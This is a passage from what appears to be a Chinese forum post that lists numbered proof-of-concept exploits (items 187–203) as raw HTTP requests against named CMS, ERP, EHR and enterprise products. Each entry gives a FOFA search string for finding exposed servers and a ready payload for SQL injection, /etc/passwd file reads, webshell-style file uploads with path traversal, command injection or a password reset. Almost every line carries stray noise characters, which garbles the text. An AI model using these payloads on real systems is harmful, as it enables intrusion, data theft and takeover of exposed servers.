# V: T4 m. }: i/ @2 k$ m, j( zHost: your-ip* r2 V8 S) l- P' t8 ?$ A9 P2 X$ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) ?$ d2 h) G. U% ^! a0 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8: \* z4 J" O3 I+ G/ p$ K1 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 S( S: M- S7 I* X) HAccept-Encoding: gzip, deflate
) G {: Q) L' S& oConnection: close
$ ^, R! J! O1 r [+ K7 NContent-Type: application/x-www-form-urlencoded
( x% k& l$ t) s" h8 c. j4 l
' N% n/ V: V& F% j; W) Ureq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450/ P. N( H8 h. u+ m
' X W' o8 D! ]. g/ G/ @; l: H7 y2 C: @% C8 z3 y
187. Mura CMS processAsyncObject SQL注入+ f' i7 U; K# @+ W4 u
CVE-2024-32640
0 f+ U2 o. K; T8 |8 B) F! \, CFOFA:"Mura CMS"
n5 N+ C) r& R* X) L4 X+ jPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
6 Q) F; }$ c* g UHost: your-ip
. ?9 S3 n) ~/ d9 M! EContent-Type: application/x-www-form-urlencoded
1 l1 ~/ e, \, \- Z+ a2 Z! L+ H* \' ?! [8 ?$ q$ S/ B% C. R
. @: f1 n. o. s3 E2 z1 bobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1" v% ^% q1 d, {' a( C: C
- p: h G3 \) u, t2 s4 Q
4 _6 N( h' L7 C3 V& Z2 c m5 R188. 叁体-佳会视频会议 attachment 任意文件读取; ~" H! _( q1 l3 o" N: `
version <= 3.9.7
% Y* t) `# @! ]; t$ A# LFOFA:body="/system/get_rtc_user_defined_info?site_id"! T3 } m! L8 w; D# [; k
GET /attachment?file=/etc/passwd HTTP/1.1& n8 u, v% I; m2 F( n2 [0 Y
Host: your-ip' H+ B: o2 w' W1 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& H. g2 D! `1 r$ n3 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% u. S2 c4 ]( A5 R2 I5 Y
Accept-Encoding: gzip, deflate. d" {2 _( _# c+ S& A& Y$ f. R
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. H2 x7 w& H+ x7 pConnection: close
) p$ u: b4 u! J; L. X: ?$ E& w6 S3 ~9 Y# F
@4 o, R5 x! o1 k2 R9 l
189. 蓝网科技临床浏览系统 deleteStudy SQL注入) U) j5 \; x$ ~
FOFA:app="LANWON-临床浏览系统"7 @1 P6 W" M/ {7 P' j
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, R8 y/ U1 A+ f
Host: your-ip' B% {# o8 Q& t2 x. q" Y/ x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, O& O# }, @9 y0 N& R) ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ v/ \" \1 T& b8 H
Accept-Encoding: gzip, deflate
, J/ q8 l7 ]7 Z% s1 OAccept-Language: zh-CN,zh;q=0.9& a8 [1 Z6 [3 ?* x, p1 Z
Connection: close4 a2 y' c. W; B' U3 l
' b2 ?) C+ T) e1 Z4 Y. }, @. I. e& o) L' b3 Z) ]- p
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 q6 g4 F2 {0 o: h- a: e- u9 z& ^/ ]FOFA:title=="短视频矩阵营销系统"
! z% P6 v2 N) s8 nPOST /index.php/admin/Userinfo/poihuoqu HTTP/25 n! S9 O! x# J; n! h
Host: your-ip. u% a0 u* I% }# t8 C3 {$ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
$ e( P+ C8 G; f% ]( v1 E% w5 Q( aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- O0 w6 ^/ C1 T* b' w. D
Content-Type: application/x-www-form-urlencoded5 L6 M+ l3 ]$ I9 d+ t
Accept-Encoding: gzip, deflate* `/ t1 A, }' S9 U
Accept-Language: zh-CN,zh;q=0.9
+ {3 J7 X2 l/ y2 E3 @. S: u9 F
- b$ ~" i0 G& w7 i3 f m! Spoi=file:///etc/passwd
9 _4 g [, n$ ~
. g+ w* Z* Q+ Y4 Y
$ ^# ]! d# u" H, X( y H. J# X191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入+ [: U! d5 k+ _( r9 y7 P
FOFA:body="/CDGServer3/index.jsp"/ ^0 L7 H2 j1 s; X* R
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
, }2 m4 n- |6 o5 gHost: your-ip
# v$ K7 \# U. |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* J' e9 G& Z* q$ \ O
Content-Type: application/x-www-form-urlencoded
; A4 {$ M3 Y. E( E6 C9 e
0 V$ e* B! e1 n( S$ @6 Scommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=# }$ P3 J: f* B7 C( o, W" z
/ u0 H$ ]& H2 b
' N5 r; T8 m' o0 c! L4 I7 G l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
7 P2 e2 R( G4 |- UFOFA:title="用户登录_富通天下外贸ERP"
+ q# s% Y- U) m: \5 Y( R: k" ^POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1+ c* r$ j: r$ ?2 W
Host: your-ip; L; l8 N( @6 D1 y7 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 t1 ^' F; j; R$ {. tContent-Type: application/x-www-form-urlencoded; h$ i1 I4 Y% @) a, D7 O7 x0 T
) v, N8 u3 X# h" {
A0 ~* p/ k! b% H<% @ webhandler language="C#" class="AverageHandler" %> i# a& V I$ N% |) @$ p
using System;4 f; ?) N' l7 Y3 _
using System.Web;
8 d# b* o( K: [6 S7 K% `public class AverageHandler : IHttpHandler' F G& \0 }, r! z8 k- G3 Z
{
6 a! v: t1 u. }0 w0 H+ Z+ }public bool IsReusable
8 d: p1 n, ?/ |" \9 z% |{ get { return true; } }
/ v4 `( Z7 q! ^5 P# Kpublic void ProcessRequest(HttpContext ctx)
0 ~6 v% ] D9 W3 G& R& K1 `{* {# f' O! O/ Y$ i# n- z7 n) R
ctx.Response.Write("test");
) q! V3 G1 K9 S3 E1 ~9 r}
5 @$ P& x$ O% ^4 Y' l F}# u. C( P5 K$ e; w3 i9 r
_( r2 J1 w7 Z1 R, R
0 z5 R- C$ X. O: f
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
" U- L3 A$ L# y9 b5 p7 L; tFOFA:body="山石云鉴主机安全管理系统"% p4 N5 S5 J) R5 _* d/ V
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
# ]: p3 W% d1 o8 z5 EHost:# l; S5 Z6 S2 `3 f
Cookie: PHPSESSID=2333333333333;! h: d7 _* L+ Y3 w
Content-Type: application/x-www-form-urlencoded
0 s8 g+ W) P6 `2 E9 l# M% LUser-Agent: Mozilla/5.0. X0 z& u: u6 `3 y# E1 f) l, Z8 |
% X; H& t6 B2 B3 y) o" Y
! n8 [, g$ `, q- vPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
! N( a0 @% O% P% O# lHost:7 E) N& G6 l+ |- n$ m
User-Agent: Mozilla/5.0
% v+ p1 W0 \) ?2 H8 l/ P$ qAccept-Encoding: gzip, deflate3 S9 [- l1 x. Q y; H
Accept: */*
% u) T. C5 d) k) i- d ZConnection: close* _3 f' E$ d7 L8 \
Cookie: PHPSESSID=2333333333333;/ K9 J1 {$ {% i" f* t
Content-Type: application/x-www-form-urlencoded
' u ]( J2 Y3 q8 |, FContent-Length: 84
* F/ w% ~2 L& M
2 u8 J& |2 o3 Y/ E( ?3 gparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
/ ?( u% {3 G) f9 v) l! M. B/ N' o8 k
6 ~. S* e w0 t p p/ y N3 A) e, {- A& ^( ~& n2 }
GET /master/img/config HTTP/1.1; a. j# o: D( j2 U- g8 t
Host:
1 S: S: Y2 r6 N- N# ]7 o+ V; ?) rUser-Agent: Mozilla/5.0
8 }+ R2 R2 \5 y# o- p8 c9 J! o& o) ]6 [) n5 X
) f3 G. A0 B. D4 [3 t+ P: l- P' o) L
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传$ w$ s/ ]. r# C$ _, f/ L8 p
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 }9 ~1 s( z% X! Y; t: F2 I" P7 E+ p( j( f* a
POST /servlet/uploadAttachmentServlet HTTP/1.1( ^% w4 }+ i. o9 o
Host: host( d& }- V* a7 i( h/ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' d( w7 H1 z( }7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, ^9 k) l2 |5 j0 M, x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; B4 m) r& e5 G* p" z+ n
Accept-Encoding: gzip, deflate
$ z" r% g; E7 x5 D0 x& [Connection: close* u2 L6 \" F ?2 }0 @" }) a3 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk! k a, a2 s; i( G2 R7 A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk$ g$ ?0 a; O3 d, v5 Y
: O; x9 N# h. y+ B- v2 s/ C2 i
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
0 t, s( n( e7 _8 @2 sContent-Type: text/plain
% }6 C" A' L* L: T( W<% out.println("hello");%>
7 }& C" f3 m: L9 s6 O% |( D------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 e4 _" N7 B4 R6 v# u& x5 PContent-Disposition: form-data; name="json"
2 T1 k, u, c& r" l {"iq":{"query":{"UpdateType":"mail"}}}
, F( t, Z: `8 `& |4 W+ r; F------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
8 M$ e% N* m1 G+ r* h) n) _$ {( G& N/ l: R, l
" r: U$ q+ Q/ S3 J
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行 l- X4 W7 j+ Z5 e- O8 ^* j
FOFA:title=="飞鱼星企业级智能上网行为管理系统
@0 L: @; ^* \3 _POST /send_order.cgi?parameter=operation HTTP/1.1! P7 c M0 \* F
Host: 127.0.0.18 R- }" _+ D% Z; `- n
Pragma: no-cache; z5 I2 ^" ?; G6 v. c
Cache-Control: no-cache
, S: }$ B. ]( y* z. ]' b4 M4 c( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; V& k# Q$ Y- E) w
Accept: */*: G1 U% E. c2 e
Accept-Encoding: gzip, deflate$ z3 J4 {: n% c! ^# e& J
Accept-Language: zh-CN,zh;q=0.9
# p7 p. x; `8 X v2 L6 M/ @Connection: close7 r+ z9 ~2 C" x: |, P$ l' y
Content-Type: application/x-www-form-urlencoded. A2 I m$ C5 k6 _% V
Content-Length: 68) a" I6 `3 F5 ^( H; u# j
5 x. _# G) t) t: K8 T
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
d: N8 p: p8 t" w3 B [8 Z2 h. d' s( V; o. _
5 v m" O; t" G4 y/ ~' `% H
196. 河南省风速科技统一认证平台密码重置
, q7 o1 R- n7 T7 x3 ], ?6 H1 r1 SFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
9 i _2 p, r, a, PPOST /cas/userCtl/resetPasswordBySuper HTTP/1.11 h9 c1 W S6 j1 { y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 O- U* u1 f3 @: h
Content-Type: application/json;charset=UTF-89 _2 I* I, d7 |3 Y$ q
X-Requested-With: XMLHttpRequest2 m T* }- f. {) B5 @
Host:
9 D( O0 @0 _+ R; q( B7 S/ J3 GAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.20 x- b L" O! J( N/ g
Content-Length: 45
8 W5 a# ?8 K7 D2 [3 R/ x. xConnection: close
! ?9 r3 }& o5 ^5 t2 m1 Q9 x1 m
. K6 {/ k9 n# J6 L7 ?{"xgh":"test","newPass":"test666","email":""}: R9 j# Z* c% g: W! }
6 ^. L) D9 x5 x$ U. E! G
, I- o1 U% \* d) _
# v: z4 H& ]" N
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& p& t7 X% _& k* `7 A/ B& @& ]: B
FOFA:app="浙大恩特客户资源管理系统"# T8 |6 O: O t- k
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1# a& Y( V- s% ?$ K' g: ~
Host:
6 \# {$ U( K$ B( a( p: ?% ~1 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36$ y: O' N! _/ G
Accept-Encoding: gzip, deflate( Y" e2 X+ _' I' i) L
Connection: close! k( z( q3 m9 L( I/ ^# U. v; H
+ i! n( g1 Y- z# _+ } I6 N0 n( N' {, t+ r
$ k1 V/ W, f6 E4 k0 w3 h! ^198. 阿里云盘 WebDAV 命令注入+ B3 ^7 S8 B+ M$ L1 e
CVE-2024-296409 y- m1 o. ?# p6 Q+ K+ ?
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.10 }& F2 j/ ^4 B7 r4 I& N+ H
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
* D2 D9 W/ j3 I+ R9 rAccept: */*
& M, s5 y9 P! sAccept-Encoding: gzip, deflate2 y+ t4 O6 U4 P, B
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
, z+ R5 W0 G' _& cConnection: close
) `2 O' ~6 k; U/ N5 M5 O0 ?
; Y" {3 h$ O6 f7 `7 ?( P+ E9 H& y B6 b
199. cockpit系统assetsmanager_upload接口 文件上传; u$ h' a6 B8 N3 ~2 ^6 S( Q
$ \ x/ X. }% n* q) o
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& t0 q0 g) X6 mGET /auth/login?to=/ HTTP/1.16 u' n2 c% U8 d" h, W$ o
% j& ?/ x* Y8 o. }3 A8 B- w响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"' ?, m) Y5 `! l! V1 E- S9 O$ x
N# w2 l ~% p8 q/ D1 d# M6 I2.使用刚才上一步获取到的jwt获取cookie:
, B' w, c y8 G% Y) z
( q3 G) P4 O! X$ e, E% PPOST /auth/check HTTP/1.1* @* m) p" Q6 y
Content-Type: application/json
; P' {0 d, X4 J3 K" {. g, Y m! O+ L; ?$ ^2 P; @: ~4 N
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}3 T$ U; t) G6 I: |/ H" B
% D2 O p& y" f4 i( V响应:200,返回值:
! N0 D4 E- h; H# T- f) I; ~Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/9 o& L9 K' p) J, I
Fofa:title="Authenticate Please!"8 k+ E' F, @) F+ Z
POST /assetsmanager/upload HTTP/1.1% S5 q, Z. \6 D" V! m+ `+ `4 p; i
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# e/ n% g% W) y: p( d; A
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92) G5 k: J& G9 `* {5 u
l, }/ B; T8 ^" n$ e0 g$ V
-----------------------------36D28FBc36bd6feE7Fb3
# g: ~- V! r) m1 s0 \+ rContent-Disposition: form-data; name="files[]"; filename="tttt.php"9 q& d7 V' G- Q( e
Content-Type: text/php
+ A4 l% t# R G3 {/ ^" |& i) p" X h5 k2 Q
<?php echo "tttt";unlink(__FILE__);?>. T$ j3 E$ {' o: E. }- Z
-----------------------------36D28FBc36bd6feE7Fb3/ H4 F; ^3 P' I$ F8 }1 E
Content-Disposition: form-data; name="folder"
' m. W$ I! W5 Z( [/ T5 V* P
( B( S) n+ i+ D% I9 L4 o-----------------------------36D28FBc36bd6feE7Fb3--
, b) b6 L$ c% Z+ u) [& v- L/ H( N/ ^" i3 x) ?9 O1 b% C
z, y: [& [" J7 K/storage/uploads/tttt.php
6 C( Z6 @# x# o7 Z! i
& ? j# L5 p! h2 c: p t200. SeaCMS海洋影视管理系统dmku SQL注入
: }5 N. S! h. Y0 Z0 P0 nFOFA:app="海洋CMS"9 o# Q x7 z5 Z: g
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
1 N* K4 n8 B$ SCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
: h! y9 b, ~1 ~9 t+ | i7 \Upgrade-Insecure-Requests: 1
) i! Q9 B( r# f# zCache-Control: max-age=0
( B; ^9 J$ e) m, P& L4 Y( x. vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& ~3 U4 C3 x/ k- ^6 OAccept-Encoding: gzip, deflate
4 H& I/ u- G/ Y: wAccept-Language: zh-CN,zh;q=0.9
6 D0 X+ O$ k) C) m! f8 w( X: C$ w
) O3 ?# ?0 h# P' c( F6 {- w$ k+ G b6 D7 D! C
201. 方正全媒体新闻采编系统 binary SQL注入
2 i1 [, [4 U' LFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
1 H5 q8 Z' G7 X) iPOST /newsedit/newsplan/task/binary.do HTTP/1.1# A+ D. A$ C( `7 r& B/ s
Content-Type: application/x-www-form-urlencoded
8 T+ q$ M1 b- n1 D3 a2 |3 O( yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 }! E7 x E% y: S# R5 vAccept-Encoding: gzip, deflate0 B+ F1 \) k. O$ F' N9 e
Accept-Language: zh-CN,zh;q=0.95 s, E0 h+ n r0 `8 |% Y, I
Connection: close
1 f7 S3 z0 B4 F* d* ?8 ?. a3 Y4 A, ~# f& R9 Y: T" i7 w
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=16 P1 K2 @5 ]8 z7 ?8 V8 U
3 h1 m6 u0 e- T+ f6 F3 p/ R# Q* n' J8 _% F5 o a* t
202. 微擎系统 AccountEdit任意文件上传) H* S( t# K& u' S
FOFA:body="/Widgets/WidgetCollection/"/ {/ p% G/ j8 e* B
获取__VIEWSTATE和__EVENTVALIDATION值
# L" R9 x: t9 L0 z( b. ?" rGET /User/AccountEdit.aspx HTTP/1.14 I+ L5 p( U F3 a2 U+ B# A6 `" g
Host: 滑板人之家( t9 \/ [8 l$ F) F; {3 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
0 l, m/ I/ `0 z$ O# AContent-Length: 0
- J- Q8 n3 G9 R
9 C, L Q2 h. \
, i* d# B: }! g5 ~& {0 D替换__VIEWSTATE和__EVENTVALIDATION值0 z( T# x3 G/ Y. s2 D
POST /User/AccountEdit.aspx HTTP/1.1) s/ a7 w# [) L/ R* C$ T
Accept-Encoding: gzip, deflate, br) ~7 R1 g$ V4 X2 U! G) R- s4 W6 K+ w
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687' T( `& Q4 h) y) w' `! h
5 q& K5 X) | f. h/ T" r
-----------------------------786435874t38587593865736587346567358735687* n+ x$ W2 F v" K' F
Content-Disposition: form-data; name="__VIEWSTATE"6 q4 t% }: f* V( c
D& L2 R0 V$ ?3 a' b__VIEWSTATE/ X4 P; E* B! D% q: N
-----------------------------786435874t38587593865736587346567358735687( [* i* l# Z( y( o7 g& E
Content-Disposition: form-data; name="__EVENTVALIDATION"$ e/ b2 H. u( A7 G& w3 i
+ o4 E* ^/ F8 M3 j3 y6 q1 X- S__EVENTVALIDATION7 d) F# @5 {, L3 a, u7 k V j
-----------------------------786435874t38587593865736587346567358735687- \. D; d& Y9 X" N9 J" l6 \
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
5 I1 j9 B2 ~$ iContent-Type: text/plain0 m5 z% p- b8 E$ {7 @0 O' a& e- T
- E% j5 k+ B& T, a. JHello World! s# h( B. T4 v' |/ n
-----------------------------786435874t385875938657365873465673587356870 }' U) x" Y, [
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"" J [2 m) W2 r& Q0 A
/ O! l4 k- j6 {- e2 O
上传图片* g) Q! u9 M0 b( ]1 n2 O( |; P, m2 p
-----------------------------786435874t38587593865736587346567358735687
3 A( \- u4 L$ t1 XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName": D, v8 S+ B9 J$ t, f3 }
! o& _; C9 l9 H& N/ w) H& ~& d7 f
: ?! P: n) q+ i v-----------------------------786435874t38587593865736587346567358735687$ t# v9 M, N, j2 X" k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail", `/ C1 M) a% B( L
A' v: Q2 C2 R" i: ^1 L
& r$ ]& @7 x. |3 G0 \-----------------------------786435874t38587593865736587346567358735687--+ ^* J7 y9 Z4 p) _; t& S
- _1 L8 ?# s) q5 N* g
2 ~* f! H5 c- L+ k0 l, _
/_data/Uploads/1123.txt. S6 w `9 _7 h
& |+ J/ ^' v' A7 G; v
203. 红海云EHR PtFjk 文件上传
8 C G+ a5 L# A C8 xFOFA:body="RedseaPlatform"
5 ]8 i2 X- x; [% A2 BPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
5 H& w% _0 ^8 xHost: x.x.x.x
& U$ n6 _- [( MAccept-Encoding: gzip5 s3 [8 b O+ H h+ b' h7 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ k" }/ k. W8 |8 \* b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
: Q4 T0 e8 }, Z- C+ d# Z t. @# |. r% yContent-Length: 210* |9 i/ A% p+ S$ O! `+ S& h
1 H* j7 h6 r2 z& o
------WebKitFormBoundaryt7WbDl1tXogoZys4
N& F1 m+ Q- B/ @2 zContent-Disposition: form-data; name="fj_file"; filename="11.jsp"5 U C( Z. D+ t8 }; R( f) i
Content-Type:image/jpeg3 D9 L6 S6 N4 D) v" }
% D" e! u1 X% T( J
<% out.print("hello,eHR");%>- Y; x: U$ |9 h/ ^7 ]. y3 c
------WebKitFormBoundaryt7WbDl1tXogoZys4--
7 [: }7 x/ y. T2 z1 K" C! T4 k- C- |
: Y- f/ r) L2 n' |% _7 @, A. ^
8 A* b; R$ t8 Y) Z- M. m1 c4 e0 V( b3 i6 w. j1 Q
5 S8 {3 z1 u, b+ G) @5 o+ W: l+ J3 h$ ~
|
发表于 2024-6-5 14:31:29
收藏
支持
反对